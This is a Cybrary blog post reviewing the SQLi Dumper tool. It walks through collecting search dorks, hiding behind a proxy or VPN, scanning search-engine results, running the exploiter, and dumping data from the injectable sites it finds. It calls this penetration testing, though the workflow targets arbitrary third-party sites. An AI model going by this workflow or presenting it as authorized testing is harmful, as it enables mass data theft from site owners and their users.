Amazon Web Services is currently experiencing an outage that may impact your experience on the Cybrary application. We apologize for any inconvenience and will be monitoring this situation closely
January 21, 2020
Darcy Kempa
Individuals interested in performing penetration testing on Structured Query Language (SQL) databases should look at SQLi Dumper. This is an excellent automatic SQL injection tool that scans web applications for SQL injection vulnerabilities. It can be downloaded through the https://sqli-dumper.com website. Use/download with caution. The website also provides SQLi Dumper tutorials and other pertinent information.
This overview aims to support legal and authorized activities undertaken to improve the security of SQL databases. It does not promote SQLi Dumper as a "hacking" tool or to be used in illegal or unauthorized activities.
Background
As SQL became more popular in database design and management, so did its popularity with hackers. A central repository (database) containing personally identifiable information (PII), credit card data, and other information was still a tempting target for hackers. A business can use SQLi Dumper as part of its cybersecurity program to prevent SQL Injection attacks.
SQLi Dumper
This tool uses a 6-phase process to provide the requested information. Each phase, in turn, has several steps, and all are easy to understand.
- Phase 1. Collect dorks.
- Phase 2. Use a Proxy or VPN.
- Phase 3. Insert dorks and start the scanner.
- Phase 4. Click SQL Injection and start the exploiter.
- Phase 5. Select URLs for searching.
- Phase 6. Dump and save the data.
Dorks
Dorks are search criteria selected by the user. There are three categories located within the SQLi Dumper Dork Generator. The user can select dorks from Names/Keywords, Page Format, and Page Type.
The Names/Keywords category focuses on the names of pages and/or keywords to search. The name of a page can be seen in the browser address bar. Examples of this are "home" and "new products." On the other hand, keywords refer to the specific content within a page like "jacket" or "social security number."
Page Format refers to the type of scripting language used to create the web page and file extensions. Examples are “.asp”, “.html”, “.php” as well as “.jsf” and “.raw”. This category helps refine the type of page for the search.
Page Type is used to provide specific query information based on a value category. Entries in this category can be used to identify a specific product (IDProduct=), a cart item (cartID=), or other assigned values and/or categories located within a database.
After the dorks are specified, they are then saved to a file for further use.
Scanning
The rest of the steps are easy to understand and follow. The dorks file is inserted into the SQLi Dumper white box. The user then selects a specific search engine or engines to use to gather the results. The next step is to click the Start Scanner button. After that, the user selects the SQL Injection option and then clicks on the Start Exploiter button. At this point, the user just waits for the results.
In the event of any confusion, there are pictures and diagrams available on the website. There are several tutorials available on YouTube.
Results
The scan results are viewed in one of five category tabs: URL's Queue, Exploitables, Injectables, Non-Injectables, and Trash Collector. The Injectables tab is of particular interest because the information presented includes the URL and the Method but may also include SQL Version and User information. The Method refers to a specific vulnerability while the User information may show an email address. Both are valuable for further exploitation attempts.
The results are displayed in rows and columns. The user can click on the specific row, bringing up a pop-up window with more information. This allows the user to select specific URLs for further searching or for saving the scan results.
Opinion
Overall, SQLi Dumper is a robust penetration testing tool. The variety of dorks available helps the pen-tester target specific pages and information. The ease of use and the straightforward design make SQLi Dumper a solid option for the novice and expert alike. Anyone involved in cybersecurity should take a look at this powerful tool.
Pertinent Training Options.
Cybrary provides online training courses in information technology and cybersecurity. These courses cover a myriad of subjects, from project management to penetration testing to auditing. The following links are provided for your consideration.
- Cybrary Home Page
- Introduction to SQL
- SQL Injection
Start learning with Cybrary
Create a free account
Related Posts
Building a Security Team
June 27, 2023
Digital Forensics and Incident Response: What It Is, When You Need It, and How to Implement It
A quick guide to digital forensics and incident response (DFIR): what it is, when it’s needed, how to implement a cutting-edge program, and how to develop DFIR skills on your team.
Read More
Building a Security Team
June 28, 2023
How to Build a Red Team
An overview of what a red team is (and isn’t), and practical tips on how to build a Red Team and develop offensive security skills in your team.
Read More
Tools & Applications
June 7, 2023
How to Make the Most of Blending Learning with Cybrary Live
Learn how to get the most from your cybersecurity training platform by blending on-demand learning with virtual, live courses led by industry experts.
Read More
News & Events
June 7, 2023
Introducing the New Cybrary Learner Experience
Cybrary is launching a key update to the Cybrary Learner experience to elevate hands-on learning and measurement as guiding tenets of Cybrary’s mission.
Read More
